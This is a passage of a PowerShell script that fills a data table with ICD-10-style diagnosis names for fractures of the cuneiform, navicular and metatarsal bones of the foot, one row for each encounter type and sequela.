fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of lateral cuneiform of unspecified foot","Displaced fracture of lateral cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of right foot","Nondisplaced fracture of lateral cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of left foot","Nondisplaced fracture of lateral cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of lateral cuneiform of unspecified foot","Nondisplaced fracture of lateral cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of right foot","Displaced fracture of intermediate cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of left foot","Displaced fracture of intermediate cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of intermediate cuneiform of unspecified foot","Displaced fracture of intermediate cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of right foot","Nondisplaced fracture of intermediate cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of left foot","Nondisplaced fracture of intermediate cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of intermediate cuneiform of unspecified foot","Nondisplaced fracture of intermediate cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of right foot","Displaced fracture of medial cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of left foot","Displaced fracture of medial cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of medial cuneiform of unspecified foot","Displaced fracture of medial cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of right foot","Nondisplaced fracture of medial cuneiform of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of left foot","Nondisplaced fracture of medial cuneiform of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of medial cuneiform of unspecified foot","Nondisplaced fracture of medial cuneiform of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of right foot","Displaced fracture of navicular [scaphoid] of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of left foot","Displaced fracture of navicular [scaphoid] of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of navicular [scaphoid] of unspecified foot","Displaced fracture of navicular [scaphoid] of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of right foot","Nondisplaced fracture of navicular [scaphoid] of right foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of left foot","Nondisplaced fracture of navicular [scaphoid] of left foot, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced fracture of navicular [scaphoid] of unspecified foot","Nondisplaced fracture of navicular [scaphoid] of unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), right foot","Fracture of unspecified metatarsal bone(s), right foot, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), left foot","Fracture of unspecified metatarsal bone(s), left foot, sequela") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Fracture of unspecified metatarsal bone(s), unspecified foot","Fracture of unspecified metatarsal bone(s), unspecified foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, subsequent encounter for fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, right foot","Displaced fracture of first metatarsal bone, right foot, sequela") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, initial encounter for open fracture") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced fracture of first metatarsal bone, left foot, subsequent encounter for fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced fracture of first metatarsal bone, left foot","Displaced 